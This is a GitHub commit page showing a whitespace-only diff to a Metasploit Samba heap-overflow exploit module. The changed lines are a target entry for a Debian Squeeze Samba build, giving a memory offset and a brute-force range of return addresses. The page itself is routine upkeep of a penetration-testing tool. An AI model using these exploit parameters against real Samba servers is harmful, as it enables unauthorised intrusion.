We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 4c64676 commit aba69d8Copy full SHA for aba69d8
modules/exploits/linux/samba/setinfopolicy_heap.rb
@@ -99,16 +99,16 @@ def initialize(info = {})
99
}
100
],
101
['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
102
- {
103
- 'Offset' => 0x11c0,
104
- 'Bruteforce' =>
105
106
- # The start should be 0x680 aligned, and then step 0x1000.
107
- 'Start' => { 'Ret' => 0xb6aaa1b0 },
108
- 'Stop' => { 'Ret' => 0xb6ce91b0 },
109
- 'Step' => 0x1000
110
- }
111
+ {
+ 'Offset' => 0x11c0,
+ 'Bruteforce' =>
+ # The start should be 0x680 aligned, and then step 0x1000.
+ 'Start' => { 'Ret' => 0xb6aaa1b0 },
+ 'Stop' => { 'Ret' => 0xb6ce91b0 },
+ 'Step' => 0x1000
+ }
112
]
113
114
'DisclosureDate' => 'Apr 10 2012',
0 commit comments